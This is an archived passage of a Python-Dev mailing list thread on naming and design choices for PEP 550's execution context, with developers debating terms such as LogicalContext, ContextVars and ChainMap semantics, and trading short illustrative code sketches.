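Spelled out a little further, that task-locals example would read roughly as follows (new_context_key is from the PEP; the handler and helper names are invented for illustration):

    current_request = new_context_key()

    async def handle_http_request(request):
        # Explicit write into the context of the current task.
        current_request.set(request)
        await render_response()

    async def render_response():
        # Explicit read later in the same task, without threading the
        # request object through every intermediate call.
        request = current_request.get()
        ...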
Yury From solipsis at pitrou.net Wed Aug 23 12:56:41 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 23 Aug 2017 18:56:41 +0200 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> Message-ID: <20170823185641.50393e4b@fsol> On Wed, 23 Aug 2017 12:19:40 -0400 Yury Selivanov wrote: > PEP 550 refers to generators and asynchronous tasks as "logical threads", > and "logical context" stems directly from that notion. I wouldn't refer to a generator as a "thread" personally. A thread essentially executes without intervention from outside code, which is not the case for a generator (where resumption is controlled by explicit next() calls or iteration by the consumer). That is also why I proposed the more general "task" (and "task context"). Of course, capitalized "Task" is given a specific meaning by asyncio... Regards Antoine. From yselivanov.ml at gmail.com Wed Aug 23 14:27:55 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Wed, 23 Aug 2017 14:27:55 -0400 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <20170823185641.50393e4b@fsol> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> Message-ID: On Wed, Aug 23, 2017 at 12:56 PM, Antoine Pitrou wrote: > On Wed, 23 Aug 2017 12:19:40 -0400 > Yury Selivanov wrote: >> PEP 550 refers to generators and asynchronous tasks as "logical threads", >> and "logical context" stems directly from that notion. > > I wouldn't refer to a generator as a "thread" personally. A thread > essentially executes without intervention from outside code, which is > not the case for a generator (where resumption is controlled by > explicit next() calls or iteration by the consumer). I agree. That's why we are rewriting the PEP without mentioning "logical threads". > > That is also why I proposed the more general "task" (and "task > context"). Of course, capitalized "Task" is given a specific > meaning by asyncio... Yeah.. I like TaskContext when it's applied to asynchronous code. It doesn't really work for generators because we never refer to generators as tasks. Out of what was proposed so far to replace Logical Context: 1. DynamicContext: close to "dynamic scoping", but tries to avoid mentioning "scopes". There are only a few languages where dynamic scoping is implemented, so people are generally not aware of it. 2. ContextFrame and all frame-related names: implies that EC is somehow implemented on top of frames or is frame-specific (which is not always true). 3. ImplicitContext: covers one specific property observed from specific examples. Context in PEP 550 is managed explicitly in some cases. There are many use cases when API users will be working with it explicitly too (to write/read data from it). FWIW I believe that "ExplicitContext" would be more accurate than "ImplicitContext". 4. LocalContext: we use "local" to describe local variables and scoping in Python, we want to avoid any confusion here. 5. TaskContext: works for asynchronous tasks, but not for generators. I don't think that replacing LogicalContext with any name in this list will make any improvement.
Yury From guido at python.org Wed Aug 23 14:47:55 2017 From: guido at python.org (Guido van Rossum) Date: Wed, 23 Aug 2017 11:47:55 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> Message-ID: In favor of ImplicitContext is one point: it is indeed "implicit" if you compare it with the "explicit" way of passing state around, which would require an extra argument containing the state for any function that uses the state *or calls a function that uses the state* (recursively). On Wed, Aug 23, 2017 at 11:27 AM, Yury Selivanov wrote: > On Wed, Aug 23, 2017 at 12:56 PM, Antoine Pitrou > wrote: > > On Wed, 23 Aug 2017 12:19:40 -0400 > > Yury Selivanov wrote: > >> PEP 550 refers to generators and asynchronous tasks as "logical threads", > >> and "logical context" stems directly from that notion. > > > > I wouldn't refer to a generator as a "thread" personally. A thread > > essentially executes without intervention from outside code, which is > > not the case for a generator (where resumption is controlled by > > explicit next() calls or iteration by the consumer). > > I agree. That's why we are rewriting the PEP without mentioning > "logical threads". > > > > > That is also why I proposed the more general "task" (and "task > > context"). Of course, capitalized "Task" is given a specific > > meaning by asyncio... > > Yeah.. I like TaskContext when it's applied to asynchronous code. It > doesn't really work for generators because we never refer to > generators as tasks. > > Out of what was proposed so far to replace Logical Context: > > 1. DynamicContext: close to "dynamic scoping", but tries to avoid > mentioning "scopes". There are only a few languages where dynamic > scoping is implemented, so people are generally not aware of it. > > 2. ContextFrame and all frame-related names: implies that EC is > somehow implemented on top of frames or is frame-specific (which is > not always true). > > 3. ImplicitContext: covers one specific property observed from > specific examples. Context in PEP 550 is managed explicitly in some > cases. There are many use cases when API users will be working with it > explicitly too (to write/read data from it). FWIW I believe that > "ExplicitContext" would be more accurate than "ImplicitContext". > > 4. LocalContext: we use "local" to describe local variables and > scoping in Python, we want to avoid any confusion here. > > 5. TaskContext: works for asynchronous tasks, but not for generators. > > I don't think that replacing LogicalContext with any name in this list > will make any improvement. > > Yury > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > guido%40python.org > -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed...
URL: From ethan at stoneleaf.us Wed Aug 23 15:08:50 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Wed, 23 Aug 2017 12:08:50 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> Message-ID: <599DD2C2.2010402@stoneleaf.us> On 08/23/2017 11:27 AM, Yury Selivanov wrote: > Out of what was proposed so far to replace Logical Context: > >[...] > > I don't think that replacing LogicalContext with any name in this list > will make any improvement. How about ExecutionContext and ContextVars? We are already used to different levels of variables: global, local, non-local, class. I think having variables tied to a Context, and having search flow back to previous Contexts, would be easy to understand. -- ~Ethan~ From yselivanov.ml at gmail.com Wed Aug 23 15:14:04 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Wed, 23 Aug 2017 15:14:04 -0400 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> Message-ID: On Wed, Aug 23, 2017 at 2:47 PM, Guido van Rossum wrote: > In favor of ImplicitContext is one point: it is indeed "implicit" if you > compare it with the "explicit" way of passing state around, which would > require an extra argument containing the state for any function that uses > the state *or calls a function that uses the state* (recursively). This is a good point; now I understand the reasoning better. I guess I'm looking at this from the perspective of PEP 550 users. They will use either the ContextKey-like API described in the PEP now, or something similar to threading.local() to store values in the context of a generator or an async task. From the standpoint of the user, they work with some sort of a "global" variable. To me, renaming LC to ImplicitContext sounds similar to saying that using global variables is implicit, or calling the "global" scope "implicit". Yury From yselivanov.ml at gmail.com Wed Aug 23 15:17:24 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Wed, 23 Aug 2017 15:17:24 -0400 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <599DD2C2.2010402@stoneleaf.us> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> Message-ID: > How about ExecutionContext and ContextVars? > We are already used to different levels of variables: global, local, non-local, class. I think having variables tied to a Context, and having search flow back to previous Contexts, would be easy to understand. Yeah, I had this idea about ContextVars and so far I like it more than Context Keys and Context Values. In the next version of the PEP (will post it soon), we use Execution Context, Logical Context, and Context Variable terminology (the debate over whether we should use other names is, of course, still open).
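To make the terminology concrete, a rough sketch of how the three terms would relate in code (the spellings are provisional and may still change in the next draft):

    # A Context Variable is created once, typically at module level:
    var = new_context_key('mylib.var')   # provisional factory used earlier in this thread

    var.set(42)        # writes the value into the topmost Logical Context
    print(var.get())   # looks it up through the Execution Context --
                       # the stack of Logical Contexts -- topmost first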
Yury From hodgestar+pythondev at gmail.com Wed Aug 23 16:05:50 2017 From: hodgestar+pythondev at gmail.com (Simon Cross) Date: Wed, 23 Aug 2017 22:05:50 +0200 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> Message-ID: What about "CoroutineScope" or "CoroutineContext"? From ethan at stoneleaf.us Wed Aug 23 18:47:44 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Wed, 23 Aug 2017 15:47:44 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> Message-ID: <599E0610.7090508@stoneleaf.us> On 08/23/2017 12:17 PM, Yury Selivanov wrote: >> How about ExecutionContext and ContextVars? > >> We are already used to different levels of variables: global, local, non-local, class. I think having variables tied to a Context, and having search flow back to previous Contexts, would be easy to understand. > > Yeah, I had this idea about ContextVars and so far I like it more than > Context Keys and Context Values. > > In the next version of the PEP (will post it soon), we use Execution > Context, Logical Context, and Context Variable terminology (the debate > over whether we should use other names is, of course, still open). ContextVars is actually a different name for LogicalContext. So it would be:

    ExecutionContext = [ContextVars()[, ContextVars()[ ...]]]

and you get the (threading.local-like) ContextVars by

    context_vars = sys.get_context_vars()  # or whatever
    context_vars.verbose = ...

-- ~Ethan~ From jimjjewett at gmail.com Thu Aug 24 00:32:45 2017 From: jimjjewett at gmail.com (Jim J. Jewett) Date: Thu, 24 Aug 2017 00:32:45 -0400 Subject: [Python-Dev] PEP 550 leak-in vs leak-out, why not just a ChainMap Message-ID: In https://mail.python.org/pipermail/python-dev/2017-August/148869.html Nick Coghlan wrote: > * what we want to capture at generator creation time is > the context where writes will happen, and we also > want that to be the innermost context used for lookups So when creating a generator, we want a new (empty) ImplicitContext map to be the head of the ChainMap. Each generator should have one of its own, just as each generator has its own frame. And the ChainMap delegation goes up the call stack, just as an exception would. Eventually, it hits the event loop (or other Executor) which is responsible for ensuring that the ChainMap eventually defers to the proper (Chain)Map for this thread or Task. > While the context is defined conceptually as a nested chain of > key:value mappings, we avoid using the mapping syntax because of the > way the values can shift dynamically out from under you based on who > called you ... > instead of having the problem of changes inside the > generator leaking out, we instead had the problem of > changes outside the generator *not* making their way in I still don't see how this is different from a ChainMap. If you are using a stack(chain) of [d_global, d_thread, d_A, d_B, d_C, d_mine] maps as your implicit context, then a change to the d_thread map (that some other code could make) will be visible unless it is masked.
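As a toy demonstration of that visibility rule with today's collections.ChainMap (ChainMap searches its maps left to right, so the localmost map comes first; the 'timeout' key is just a hypothetical example):

    from collections import ChainMap

    d_global, d_thread, d_mine = {}, {}, {}
    ctx = ChainMap(d_mine, d_thread, d_global)

    d_thread['timeout'] = 5    # a change made by some other code
    print(ctx['timeout'])      # 5 -- visible through the chain
    d_mine['timeout'] = 10     # masked in the localmost map
    print(ctx['timeout'])      # 10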
Similarly, if the fallback for d_C changes from d_B to d_B1 (which points directly to d_thread), that will be visible for any keys that were previously resolved in d_A or d_B, or are now resolved in d_B1. Those seem like exactly the cases that would (and should) cause "shifting values". This does mean that you can't cache everything in the localmost map, but that is a problem with the optimization regardless of how the implementation is done. In https://mail.python.org/pipermail/python-dev/2017-August/148873.html Yury Selivanov wrote: > Any code that uses EC will not see any difference [between mutable vs immutable but replaced LC maps], > because it can only work with the top LC. > Back to generators. Generators have their own empty LCs when created > to store their *local* EC modifications. OK, so just as they have their own frame, they have their own ChainMap, and the event loop is responsible for resetting the fallback when it schedules them. > When a generator is *being* iterated, it pushes its LC to the EC. When > the iteration step is finished, it pops its LC from the EC. I'm not sure it helps to think of a single stack. When the generator is active, it starts with its own map. When it is in the call chain of the active generator, its map will be in the chain of delegations. When neither it nor a descendant is active, no code will end up delegating to it. If the delegation graph has 543 generators delegating directly to the thread-wide map, there is no reason to pop/push an execution stack every time a different generator is scheduled, since only that generator itself (and code it calls) will even care. > HAMT is a way to efficiently implement immutable mappings ... > using regular dicts and copy, set() would be O(log N) Using a ChainMap, set affects only the localmost map and is therefore O(1). get could require stacksize lookups, but ... (A) How many values do you expect a typical generator to use? The Django survey suggested mostly 0, sometimes 1, occasionally 2. So caching the values of all possible keys probably won't pay off. (B) Other than the truly global context and thread-level context, how many of these maps do you expect to be non-empty? (C) How deep do you expect the stack to get? Are we talking about 100 layers of mappings to check between the current generator and the thread-wide defaults? Even if we are, verifying that there hasn't been a change in some mid-level layer requires tracking the versions of each mid-level layer. (If the version is globally unique, that would also ensure that the stack hasn't changed.) Is that really faster than checking that the map is empty? And, of course, using a ChainMap means that the keys do NOT have to be predefined ... so the Key class really can be skipped. -jJ From yselivanov.ml at gmail.com Thu Aug 24 01:12:48 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Thu, 24 Aug 2017 01:12:48 -0400 Subject: [Python-Dev] PEP 550 leak-in vs leak-out, why not just a ChainMap In-Reply-To: References: Message-ID: Hi Jim, Sorry, I won't answer all questions/points directly. We are working on a new version of the PEP that will hopefully address most of them. Some comments inlined below: On Thu, Aug 24, 2017 at 12:32 AM, Jim J. Jewett wrote: [..] > I still don't see how this is different from a ChainMap. Because conceptually it's not different. In the next version of the PEP it will become more apparent. [..] > >> HAMT is a way to efficiently implement immutable mappings ...
>> using regular dicts and copy, set() would be O(log N) The key requirement for using immutable datastructures is to make the "get_execution_context" operation fast. Currently, the PEP doesn't do a good job at explaining why we need that operation and why it will be used by asyncio.Task and call_soon, so I understand the confusion. This will be fixed in the next PEP version. > > Using a ChainMap, set affects only the localmost map and is therefore > O(1). get could require stacksize lookups, but ... Again, the PEP is essentially implemented through a very specialized version of ChainMap, although written in C with a few extra optimizations and properties. > > (A) How many values do you expect a typical generator to use? The > Django survey suggested mostly 0, sometimes 1, occasionally 2. So > caching the values of all possible keys probably won't pay off. Not many, but caching is still just as important, because some API users want the "get()" operation to be as fast as possible under all conditions. > > (B) Other than the truly global context and thread-level context, how > many of these maps do you expect to be non-empty? It's likely that most of them will be empty in most cases. Although we can imagine a degenerate case of a recursive generator that modifies the EC on each iteration. > > (C) How deep do you expect the stack to get? Are we talking about > 100 layers of mappings to check between the current generator and the > thread-wide defaults? Even if we are, verifying that there hasn't > been a change in some mid-level layer requires tracking the versions > of each mid-level layer. (If the version is globally unique, that would > also ensure that the stack hasn't changed.) Is that really faster > than checking that the map is empty? The stack can be as deep as the recursion limit. > > And, of course, using a ChainMap means that the keys do NOT have to be > predefined ... so the Key class really can be skipped. The first version of the PEP had no ContextKey object and the most popular complaint about it was that the key names will clash. The ContextKey design avoids the clashing issue entirely and enables fast Python and C APIs (because of the cache). Yury From solipsis at pitrou.net Thu Aug 24 04:22:33 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Thu, 24 Aug 2017 10:22:33 +0200 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> Message-ID: <20170824102233.6229b43c@fsol> On Wed, 23 Aug 2017 14:27:55 -0400 Yury Selivanov wrote: > > Yeah.. I like TaskContext when it's applied to asynchronous code. It > doesn't really work for generators because we never refer to > generators as tasks. > > Out of what was proposed so far to replace Logical Context: > > 1. DynamicContext: close to "dynamic scoping", but tries to avoid > mentioning "scopes". There are only a few languages where dynamic > scoping is implemented, so people are generally not aware of it. > > 2. ContextFrame and all frame-related names: implies that EC is > somehow implemented on top of frames or is frame-specific (which is > not always true). > > 3. ImplicitContext: covers one specific property observed from > specific examples. Context in PEP 550 is managed explicitly in some > cases. There are many use cases when API users will be working with it > explicitly too (to write/read data from it).
FWIW I believe that > "ExplicitContext" would be more accurate than "ImplicitContext". > > 4. LocalContext: we use "local" to describe local variables and > scoping in Python, we want to avoid any confusion here. > > 5. TaskContext: works for asynchronous tasks, but not for generators. > > I don't think that replacing LogicalContext with any name in this list > will make any improvement. I think you have a point. Though every time I want to type "logical context" it seems my fingers slip and type "local context" instead :-) The remaining question is why the logical context stack is named "execution context" and not "logical context stack" (or "logical context chain" to keep the ChainMap analogy) :-) Regards Antoine. From ncoghlan at gmail.com Thu Aug 24 04:22:55 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Thu, 24 Aug 2017 18:22:55 +1000 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> Message-ID: On 24 August 2017 at 02:19, Yury Selivanov wrote: > I think that "implicit context" is not an accurate description of what > LogicalContext is. > > "implicit context" only makes sense when we talk about decimal > context. For instance, in: > > Decimal(1) + Decimal(2) > > decimal context is implicit. But this is "implicit" from the > standpoint of that code. Decimal will manage its context > *explicitly*. > > Fixing decimal context is only one part of the PEP though. EC will > also allow us to implement asynchronous task locals: >
> current_request = new_context_key()
>
> async def handle_http_request(request):
>     current_request.set(request)
>
> Here we explicitly set and will explicitly get values from the EC. We > will explicitly manage the EC in asyncio.Task and when we schedule > callbacks. The implicit behaviour that "implicit context" refers to is the fact that if you look at an isolated snippet of code, you have no idea what context you're actually going to be querying or modifying - that's implicit in the execution of the whole program. As a user of the read/write API though, you shouldn't need to care all that much - the whole point of PEP 550 is to define default behaviours and guidelines such that it will be something sensible. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From njs at pobox.com Thu Aug 24 04:22:52 2017 From: njs at pobox.com (Nathaniel Smith) Date: Thu, 24 Aug 2017 01:22:52 -0700 Subject: [Python-Dev] PEP 550 leak-in vs leak-out, why not just a ChainMap In-Reply-To: References: Message-ID: On Wed, Aug 23, 2017 at 9:32 PM, Jim J. Jewett wrote: >> While the context is defined conceptually as a nested chain of >> key:value mappings, we avoid using the mapping syntax because of the >> way the values can shift dynamically out from under you based on who >> called you > ... >> instead of having the problem of changes inside the >> generator leaking out, we instead had the problem of >> changes outside the generator *not* making their way in > > I still don't see how this is different from a ChainMap. > > If you are using a stack(chain) of [d_global, d_thread, d_A, d_B, d_C, > d_mine] maps as your implicit context, then a change to the d_thread map > (that some other code could make) will be visible unless it is masked.
> > Similarly, if the fallback for d_C changes from d_B to d_B1 (which > points directly to d_thread), that will be visible for any keys that > were previously resolved in d_A or d_B, or are now resolved in d_B1. > > Those seem like exactly the cases that would (and should) cause > "shifting values". > > This does mean that you can't cache everything in the localmost map, > but that is a problem with the optimization regardless of how the > implementation is done. It's crucial that the only thing that can affect the result of calling ContextKey.get() is other method calls on that same ContextKey within the same thread. That's what enables ContextKey to efficiently cache repeated lookups, which is an important optimization for code like decimal or numpy that needs to access its local context *extremely* quickly (like, a dict lookup is too slow). In fact this caching trick is just preserving what decimal does right now in its thread-local handling (because accessing the threadstate dict is too slow for it). So we can't expose any kind of mutable API to individual maps, because then someone might call __setitem__ on some map that's lower down in the stack, and break caching. > And, of course, using a ChainMap means that the keys do NOT have to be > predefined ... so the Key class really can be skipped. The motivations for the Key class are to eliminate the need to worry about accidental key collisions between unrelated libraries, to provide some important optimizations (as per above), and to make it easy and natural to provide convenient APIs for things like saving and restoring the state of a value inside a context manager. Those are all orthogonal to whether the underlying structure is implemented as a ChainMap or as something more specialized. But I tend to agree with your general argument that the current PEP is trying a bit too hard to hide away all this structure where no-one can see it. The above constraints mean that simply exposing a ChainMap as the public API is probably a bad idea. Even if there are compelling performance advantages to a fancy immutable-HAMT implementation (I'm in wait-and-see mode on this myself), there are still a lot more introspection-y operations that could be provided, like:

- make a LocalContext out of a {ContextKey: value} dict
- get a {ContextKey: value} dict out of a LocalContext
- get the underlying list of LocalContexts out of an ExecutionContext
- create an ExecutionContext out of a list of LocalContexts
- given a ContextKey and a LocalContext, get the current value of the key in the context
- given a ContextKey and an ExecutionContext, get out a list of values at each level

-n -- Nathaniel J. Smith -- https://vorpus.org From njs at pobox.com Thu Aug 24 05:01:18 2017 From: njs at pobox.com (Nathaniel Smith) Date: Thu, 24 Aug 2017 02:01:18 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> Message-ID: On Thu, Aug 24, 2017 at 1:22 AM, Nick Coghlan wrote: > On 24 August 2017 at 02:19, Yury Selivanov wrote: >> I think that "implicit context" is not an accurate description of what >> LogicalContext is. >> >> "implicit context" only makes sense when we talk about decimal >> context. For instance, in: >> >> Decimal(1) + Decimal(2) >> >> decimal context is implicit. But this is "implicit" from the >> standpoint of that code. Decimal will manage its context >> *explicitly*.
>> >> Fixing decimal context is only one part of the PEP though. EC will >> also allow us to implement asynchronous task locals: >>
>> current_request = new_context_key()
>>
>> async def handle_http_request(request):
>>     current_request.set(request)
>>
>> Here we explicitly set and will explicitly get values from the EC. We >> will explicitly manage the EC in asyncio.Task and when we schedule >> callbacks. > > The implicit behaviour that "implicit context" refers to is the fact > that if you look at an isolated snippet of code, you have no idea what > context you're actually going to be querying or modifying - that's > implicit in the execution of the whole program. How about: RuntimeContext and RuntimeContextStack -n -- Nathaniel J. Smith -- https://vorpus.org From ncoghlan at gmail.com Thu Aug 24 07:37:19 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Thu, 24 Aug 2017 21:37:19 +1000 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <599E0610.7090508@stoneleaf.us> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> <599E0610.7090508@stoneleaf.us> Message-ID: On 24 August 2017 at 08:47, Ethan Furman wrote: > > ContextVars is actually a different name for LogicalContext. So it would > be: >
> ExecutionContext = [ContextVars()[, ContextVars()[ ...]]]
>
> and you get the (threading.local-like) ContextVars by
>
> context_vars = sys.get_context_vars()  # or whatever
> context_vars.verbose = ...

Migrating a (variant of a) naming subthread from python-ideas over to here, does the following sound plausible to anyone else?:

ContextLocal - read/write access API (via get()/set() methods)
ContextLocalNamespace - active mapping that CL.get()/set() manipulates
ExecutionContext - current stack of context local namespaces

Building a threading.local() style helper API would then look something like:

    class ContextLocals:
        def __init__(self, key_prefix):
            # assign via __dict__ so we don't trigger our own __setattr__
            self.__dict__['_key_prefix'] = key_prefix

        def __getattr__(self, attr):
            debugging_name = "{}.{}".format(self._key_prefix, attr)
            self.__dict__[attr] = new_local = sys.new_context_local(debugging_name)
            return new_local

        def __setattr__(self, attr, value):
            getattr(self, attr).set(value)

        def __delattr__(self, attr):
            getattr(self, attr).set(None)

    my_state = ContextLocals(__name__)

Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From barry at python.org Thu Aug 24 09:52:47 2017 From: barry at python.org (Barry Warsaw) Date: Thu, 24 Aug 2017 09:52:47 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) Message-ID: Guido van Rossum wrote: > On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: > > I worry that that's going to lead more people astray thinking this has > something to do with contextlib, which it really doesn't (it's much more > closely related to threading.local()). This is my problem with using "Context" for this PEP. Although I can't keep up with all the names being thrown around, it seems to me that in Python we already have a well-established meaning for "contexts" -- context managers, and the protocols they implement as they participate in `with` statements. We have contextlib which reinforces this. What's being proposed in PEP 550 is so far removed from this concept that I think it's just going to cause confusion (well, it does in me anyway!). To me, the functionality proposed in PEP 550 feels more like a "scope" than a "context".
Unlike a lexical scope, it can't be inferred from the layout of the source code. It's more of a dynamic "execution scope" and the stacking of "local execution scopes" reinforces that for me. You use a key to find a value in the current execution scope, and it chains up until the key is found or you've reached the top of the local execution (defined as the thread start, etc.). One other suggestion: maybe we shouldn't put these new functions in sys, but instead put them in their own module? It feels analogous to the gc module; all those functions could have gone in sys since they query and affect the Python runtime system, but it makes more sense (and improves the naming) to put them in their own module. It also segregates the functionality so that sys doesn't become a catchall that overloads you when you're reading through the sys module documentation. Cheers, -Barry From solipsis at pitrou.net Thu Aug 24 10:02:29 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Thu, 24 Aug 2017 16:02:29 +0200 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) References: Message-ID: <20170824160229.7eb4f4a2@fsol> On Thu, 24 Aug 2017 09:52:47 -0400 Barry Warsaw wrote: > > To me, the functionality proposed in PEP 550 feels more like a "scope" > than a "context". I would call it "environment" myself, but that risks confusion with environment variables. Perhaps "dynamic environment" would remove the confusion. > One other suggestion: maybe we shouldn't put these new functions in sys, > but instead put them in their own module? It feels analogous to the gc > module; all those functions could have gone in sys since they query and > affect the Python runtime system, but it makes more sense (and improves > the naming) to put them in their own module. It also segregates the > functionality so that sys doesn't become a catchall that overloads you > when you're reading through the sys module documentation. +1 from me. Regards Antoine. From jimjjewett at gmail.com Thu Aug 24 10:05:05 2017 From: jimjjewett at gmail.com (Jim J. Jewett) Date: Thu, 24 Aug 2017 10:05:05 -0400 Subject: [Python-Dev] PEP 550 leak-in vs leak-out, why not just a ChainMap In-Reply-To: References: Message-ID: On Thu, Aug 24, 2017 at 1:12 AM, Yury Selivanov wrote: > On Thu, Aug 24, 2017 at 12:32 AM, Jim J. Jewett wrote: > >> The key requirement for using immutable datastructures is to make >> the "get_execution_context" operation fast. Do you really need the whole execution context, or do you just need the current value of a specific key? (Or, sometimes, the writable portion of the context.) >> Currently, the PEP doesn't do >> a good job at explaining why we need that operation and why it will be >> used by asyncio.Task and call_soon, so I understand the confusion. OK, the schedulers need the whole context, but if implemented as a ChainMap (instead of per-key), isn't that just a single constant? As in, don't they always schedule to the same thread? And when they need another map, isn't that because the required context is already available from whichever code requested the scheduling? >>> (A) How many values do you expect a typical generator to use? The >>> Django survey suggested mostly 0, sometimes 1, occasionally 2. So >>> caching the values of all possible keys probably won't pay off. >> Not many, but caching is still just as important, because some API users >> want the "get()" operation to be as fast as possible under all >> conditions.
Sure, but only because they view it as a hot path; if the cost of that speedup is slowing down another hot path, like scheduling the generator in the first place, it may not be worth it. According to the PEP timings, HAMT doesn't beat a copy-on-write dict until over 100 items, and never beats a regular dict. That suggests to me that it won't actually help the overall speed for a typical (as opposed to worst-case) process. >>> And, of course, using a ChainMap means that the keys do NOT have to be >>> predefined ... so the Key class really can be skipped. >> The first version of the PEP had no ContextKey object and the most >> popular complaint about it was that the key names will clash. That is true of any global registry. Thus the use of keys with prefixes like com.sun. The only thing pre-declaring a ContextKey buys in terms of clashes is that a sophisticated scheduler would have less difficulty figuring out which clashes will cause thrashing in the cache. Or are you suggesting that the key can only be declared once (as opposed to once per piece of code), so that the second framework to use the same name will see a RuntimeError? -jJ From yselivanov.ml at gmail.com Thu Aug 24 10:23:23 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Thu, 24 Aug 2017 10:23:23 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On Thu, Aug 24, 2017 at 9:52 AM, Barry Warsaw wrote: > Guido van Rossum wrote: >> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >> >> I worry that that's going to lead more people astray thinking this has >> something to do with contextlib, which it really doesn't (it's much more >> closely related to threading.local()). > > This is my problem with using "Context" for this PEP. Although I can't > keep up with all the names being thrown around, it seems to me that in > Python we already have a well-established meaning for "contexts" -- > context managers, and the protocols they implement as they participate > in `with` statements. We have contextlib which reinforces this. What's > being proposed in PEP 550 is so far removed from this concept that I > think it's just going to cause confusion (well, it does in me anyway!). Although nobody refers to context managers as "context", they are always called one of the following: "context manager", "CM", "context manager protocol". PEP 550 just introduces a concept of "context" that "context managers" will be able to manage. > > To me, the functionality proposed in PEP 550 feels more like a "scope" > than a "context". Unlike a lexical scope, it can't be inferred from the > layout of the source code. It's more of a dynamic "execution scope" and > the stacking of "local execution scopes" reinforces that for me. You > use a key to find a value in the current execution scope, and it chains > up until the key is found or you've reached the top of the local > execution (defined as the thread start, etc.). Yes, what PEP 550 proposes can be seen as a new scoping mechanism. But calling it a "scope" or "dynamic scope" would be a mistake (IMHO), as Python scoping is already a complex topic (with locals, nonlocals, globals, etc). Contrary to scoping, the programmer is much less likely to deal with Execution Context. How often do we use "threading.local()"? > One other suggestion: maybe we shouldn't put these new functions in sys,
